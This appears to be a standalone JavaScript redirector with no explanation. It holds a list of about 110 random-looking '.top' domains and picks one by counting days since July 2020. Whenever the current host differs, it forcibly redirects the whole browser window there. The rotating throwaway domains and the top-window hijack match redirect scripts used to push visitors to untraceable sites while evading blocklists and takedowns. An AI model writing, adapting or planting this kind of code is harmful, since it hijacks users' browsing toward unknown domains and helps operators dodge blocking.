var host = window.location.host.toLowerCase();
var url = new Array();
url.push("ovl1m.top");
url.push("heuqk.top");
url.push("ueqfj.top");
url.push("uizst.top");
url.push("pmqed.top");
url.push("osz4l.top");
url.push("nr3x7.top");
url.push("a9dbn.top");
url.push("oc15g.top");
url.push("utudz.top");
url.push("mujvt.top");
url.push("lgvv0.top");
url.push("u7xvs.top");
url.push("nrx87.top");
url.push("4gexc.top");
url.push("nx2tm.top");
url.push("3zqht.top");
url.push("lwp1i.top");
url.push("khoz4.top");
url.push("pq2lb.top");
url.push("g5ao2.top");
url.push("u9n53.top");
url.push("nrpbs.top");
url.push("nv4rz.top");
url.push("ais8d.top");
url.push("e13rg.top");
url.push("1mh3v.top");
url.push("1deyk.top");
url.push("4d6k4.top");
url.push("q2qwm.top");
url.push("98lt2.top");
url.push("m9b2n.top");
url.push("8b5ht.top");
url.push("jmu86.top");
url.push("icgo9.top");
url.push("g0woc.top");
url.push("jn94s.top");
url.push("itzub.top");
url.push("sqdbc.top");
url.push("qlpyh.top");
url.push("ofcw7.top");
url.push("kzy6c.top");
url.push("ni8lq.top");
url.push("4yjwd.top");
url.push("2q3gj.top");
url.push("qru9b.top");
url.push("288cf.top");
url.push("n8y19.top");
url.push("2zyez.top");
url.push("fbcpj.top");
url.push("spewt.top");
url.push("295yt.top");
url.push("vzn7u.top");
url.push("uyheg.top");
url.push("d7qlf.top");
url.push("6vl9i.top");
url.push("dhr51.top");
url.push("5uwb3.top");
url.push("ti1hb.top");
url.push("6bysv.top");
url.push("yz6du.top");
url.push("3v034.top");
url.push("7jptw.top");
url.push("d9isk.top");
url.push("5qq12.top");
url.push("zo8o1.top");
url.push("bneq6.top");
url.push("smuac.top");
url.push("6r0ei.top");
url.push("5kbjb.top");
url.push("0djub.top");
url.push("k728p.top");
url.push("mr8gb.top");
url.push("x2rym.top");
url.push("6ogpm.top");
url.push("tfiy9.top");
url.push("r9x5r.top");
url.push("mupak.top");
url.push("91g8m.top");
url.push("nxz87.top");
url.push("vmdg1.top");
url.push("h7pn9.top");
url.push("8vu6v.top");
url.push("ty4u7.top");
url.push("4vcbe.top");
url.push("8oibo.top");
url.push("58vqh.top");
url.push("d7oor.top");
url.push("own3b.top");
url.push("bkisp.top");
url.push("lvr4y.top");
url.push("xw53l.top");
url.push("5462x.top");
url.push("yuo1x.top");
url.push("vkdq2.top");
url.push("fhvyh.top");
url.push("l4v9g.top");
url.push("bpah9.top");
url.push("7ityn.top");
url.push("1bj2c.top");
url.push("og4xb.top");
url.push("7tiga.top");
url.push("wu2fb.top");
url.push("2yktc.top");
url.push("venup.top");
url.push("5hcoz.top");
url.push("w1f0k.top");
url.push("0hwma.top");
url.push("j2rc4.top");
url.push("vwpzk.top");
url.push("u0ayz.top");
url.push("m3d4d.top");
var from = new Date(2020, 06, 14).getTime();
var seed = 1 / 2;
var i = Math.floor((new Date().getTime() - from) * seed / 86400050);
if (i < 0 || i >= url.length) {
	i = url.length - 1
}

console.log("url[i]="+url[i]);

if (host.indexOf(url[i]) < 0) {
	if (navigator.userAgent.match(/VivoBrowser/i)) {
		top.location.href = "https://" + escape(url[i])
	} else {
		top.location.href = "https://www." + escape(url[i])
	}
}
